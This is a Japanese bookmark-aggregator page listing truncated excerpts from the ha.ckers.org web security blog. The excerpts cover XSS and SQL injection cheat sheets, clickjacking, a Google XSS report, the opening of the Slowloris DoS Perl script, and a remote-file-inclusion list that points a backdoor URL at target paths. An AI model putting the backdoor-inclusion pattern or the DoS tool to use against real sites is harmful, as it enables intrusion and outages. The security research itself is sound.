サクサク読めて、アプリ限定の機能も多数!
トップへ戻る
Google I/O
ha.ckers.org
Larry Suto is back with another report outlining the differences between some of the top web application scanners on the market. Before you get all uptight and start flaming me, I in NO WAY sponsored, encouraged or had anything to do with this test in any way. In fact, I only found out about it a few days ago. Not that I think that’ll stop the flame wars, but just direct your ire appropriately, pl
# Compiled by RSnake 01/29/2010 Mostly from milw0rm and other advisories. # Change XXpathXX to the path of your backdoor. Note that you may need to # try it against every directory on the target and because of how this was # culled you may need to add a question mark to your own XXpathXX URL: # Eg: XXpathXX => http://www.example.com/hax.txt? /2007/administrator/components/com_joomlaflashfun/admin.
#!/usr/bin/perl -w use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors print \$shost, 'dns=s' => \$host, 'httpready' => \$httpready, 'num=i' => \$connections, 'cache' => \$cache, 'port=i' => \$port, 'https' => \$ssl, 'tcpto=i' => \$tcpto, 'test' => \$test, 'timeout=i' => \$timeout, 'version' => \$version, ); if ($
Slowloris HTTP DoSCCCCCCCCCCOOCCOOOOO888@8@8888OOOOCCOOO888888888@@@@@@@@@8@8@@@@888OOCooocccc:::: CCCCCCCCCCCCCCCOO888@888888OOOCCCOOOO888888888888@88888@@@@@@@888@8OOCCoococc::: CCCCCCCCCCCCCCOO88@@888888OOOOOOOOOO8888888O88888888O8O8OOO8888@88@@8OOCOOOCoc:: CCCCooooooCCCO88@@8@88@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888@8888OOOCc:::: CooCoCoooCCCO8@88@8888888OOO888888888888888888OOOOCCCooooo
Matteo Carli wrote me today to discuss some RFI and JS stuff. We’ve been talking a lot about what uploaded images can do lately, but embedded JS is an interesting one for a few reasons. If you needed a drop for a payload, for instance. Here’s part of his email (edited slightly for formatting): So i created a simple php test like this: <?php include 'myimage.gif'; ?> and the result is like this. Im
Today is the day we can finally start talking about clickjacking. This is just meant to be a quick post that you can use as a reference sheet. It is not a thorough advisory of every site/vendor/plugin that is vulnerable - there are far too many to count. Jeremiah and I got the final word today that it was fine to start talking about this due to the click jacking PoC against Flash that was released
Originally found here but permanantly hosted on ha.ckers.org with Jeremiah's permission. Ha.ckers.org home || Jeremiah's blog Firefox Only! (1.5 - 2.0) tested on WinXP.
One of the most difficult aspects of web application security scanners is understanding how to evaluate them. Obviously the false positive false negative ratios are important, but it’s often difficult to measure, as it depends on the web application in question. However, Larry Suto came up with a very interesting concept on how to do unbiased measurements of web application scanners. One of the mo
Well, we are finally done with the XSS book (XSS Attacks - Cross Site Scripting Attacks Exploits and Defense). It’s off at the presses, and should be on the shelves in a few week’s time. We were authorized to throw up a sample chapter and the table of contents from the book for anyone who would like to read it. You can download a zipped up version of Chapter 5 and the table of contents. Since it w
SQL Injection Cheat sheet: Esp: for filter evasion - by RSnakeLoading... You must enable iframes to see this image. By RSnake Note from the author: If you don't know how SQL Injection works, this page probably won't help you. This page is for people who already understand the basics of SQL Injection attacks but want a deep understanding of the nuances regarding filter evasion. This page will also
In the same vein as the IE specific res:// URLs that can help you detect Internet Explorer, I’ve taken that detection one step further in Firefox. After discovering the issue with IETab where a user can be maliciously forced into the Internet Explorer rendering engine it got me thinking about ways to even detect that that is possible. How do you know your target is running what, and how to do you
Return to the homepage Note: This will not work if you don't have Firefox and JavaScript enabled. This works by asking the browser to render the chrome that has been registered by each browser extention. Once they load up properly it uses an onload event handler to write to a span tag. Using this you can detect what is installed on a extention by extention basis. You are not using Search Status
Google is vulnerable to cross site scripting. While surfing around the personalization section of Google I ran accross the RSS feed addition tool which is vulnerable to XSS. The employees at Google were aware of XSS as they protected against it as an error condition, however if you input a valid URL (like my RSS feed) it will return with a JavaScript function containing the URL. If you append the
I’m already back in the airport after a long day over at the world OWASP conference in New York. Among other things that were noteworthy was some extremely tacky marketing schwag from the ISC2 folks that says, “I fill the holes in your SLC”. I feel dirty having even typed that. I wish I were kidding. Ridiculous pictures of Dave Aitel wearing said schwag may or may not end up online in the near fut
XSS (Cross Site Scripting) Cheat Sheet Esp: for filter evasion By RSnake Note from the author: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to
このページを最初にブックマークしてみませんか?
『ha.ckers.org web application security lab』の新着エントリーを見る
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
